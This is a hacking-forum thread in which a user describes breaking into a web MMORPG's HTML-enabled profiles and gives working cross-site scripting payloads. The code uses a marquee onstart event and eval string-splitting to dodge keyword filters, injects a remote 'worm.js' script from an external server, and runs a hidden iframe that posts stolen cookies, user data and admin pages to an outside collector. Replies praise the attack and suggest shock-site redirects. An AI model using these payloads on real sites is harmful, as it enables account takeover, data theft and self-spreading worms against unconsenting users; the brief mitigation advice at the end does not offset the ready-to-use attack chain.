My experiences on XSS

Discuss the many weaknesses of browser security and ways to mitigate the threat

My experiences on XSS

Post by Rahiel on Mon Jan 11, 2010 12:36 pm
([msg=33216]see My experiences on XSS[/msg])

I'd like to share my findings when playing (read: hacking) a web-based mmorpg. (please see http://www.hackthissite.org/forums/viewtopic.php?f=9&t=4574 for an idea for my own mmo).

The game allowed users to have an html-enabled profile. The administrator (quite a moron) tried hard to disable any javascript, but failed miserably. It blocked words like script, document, DOM events like onmouseover among other things. Funny enough just a few DOM events where blocked but by no means all of them were blocked. This is a common mistake, because you'd need to include possible events from every browser's developer pages. There are a lot of them and new ones might be introduced with new releases. Anyway, I managed to execute my javascript using the html <marquee> element and its "onstart" event:
Code: Select all
<marquee id="thing" onstart="alert('sometext')"></marquee>


The next problem that arised was the blocking of words like alert, window and document, which are important in writing javascript code. This was easily solved using the eval() function, which wasn't blocked!
Code: Select all
<marquee id="thing" onstart="eval('ale'+'rt(\'sometext\')')"></marquee>

eval() interpretes a string as javascript code, so this way you can bypass the replace functions of the website.

You can imagine that it'd become quite a mess if you'd want to put a whole worm in one eval function, while replacing every 'document' and such things with 'docu'+'ment'. The simple solution is inserting your code from an external webserver. You can't do this using an xmlhttprequest because it doesn't allow requests to other domains, but you CAN simply insert a <script> tag into the page. (I really don't understand why browsers limit xmlhttprequest when you can easily do requests some other way...) The final code becomes:
Code: Select all
<marquee id="thing" onstart="eval('e=win'+'dow.docu'+'ment.createElement(\'scr'+'ipt\');e.setAttribute(\'src\',\'http://yourexternalserver.com/worm.js\');win'+'dow.docu'+'ment.body.appendChild(e);')"></marquee>


This gives you an awful lot of opportunities. You can gather any information from other users you shouldn't know (among user info and cookies which would allow you take over their account, as long as the website doesn't check on ip address) and pass it on to an external webserver. Again xmlhttprequest doesn't work, but again there's a simple solution:
Code: Select all
iframe=window.document.createElement('iframe');
iframe.setAttribute('scrolling', 'no');
iframe.setAttribute('width', '0');
iframe.setAttribute('height', '0');
iframe.setAttribute('frameBorder', '0');
window.document.body.appendChild(iframe)
iframe.contentWindow.document.write('<form action="http://yourexternalserver.com/gatherinfo.php" id="form" method="post"><textarea id="juice" name="juice"></textarea></form>');
iframe.contentWindow.document.getElementById('juice').innerHTML = juice;
iframe.contentWindow.document.getElementById('form').submit();

'juice' is of course the information you want to pass on ;). The options of the iframe are set to no width, border, and scrollbars so the victim doesn't notice anything. In my case I needed to perform a POST using a form because I wanted to pass on whole pages of the admin area (in case an admin looked at my profile), but if you don't need to transmit a lot of data you can simply use a GET request by setting the src of the iframe to your external server.

You could also make the victim do some POST requests (for example giving money to you) or even create a worm like samy did: http://en.wikipedia.org/wiki/Samy_%28XSS%29

So what should you do to prevent all this if users are allowed to have a html-enabled profile page? If you try to disable javascript like the admin of this game and myspace (samy) did, you might fail miserably. You could place profile pages on an another domain so xmlhttprequests can't do any harm, but as seen in this post that can also be bypassed. I recommend to just disallow html it and try hard to block html in all user inputs.
Rahiel
New User
New User
 
Posts: 16
Joined: Fri May 09, 2008 2:55 pm
Blog: View Blog (0)


Re: My experiences on XSS

Post by c0cytus on Thu Mar 25, 2010 9:17 am
([msg=37296]see Re: My experiences on XSS[/msg])

Thank you, Rahiel!

It's well written and good material for a little case study.
c0cytus
New User
New User
 
Posts: 1
Joined: Fri Jul 24, 2009 3:24 am
Blog: View Blog (0)


Re: My experiences on XSS

Post by sanddbox on Thu Mar 25, 2010 2:56 pm
([msg=37300]see Re: My experiences on XSS[/msg])

Why not redirect them to a shock site? The simple things are the most beautiful.
Image

HTS User Composition:
95% Male
4.98% Female
.01% Monica
.01% Goat
User avatar
sanddbox
Expert
Expert
 
Posts: 2337
Joined: Sat Jul 04, 2009 5:20 pm
Blog: View Blog (0)



Return to Web

Who is online

Users browsing this forum: No registered users and 0 guests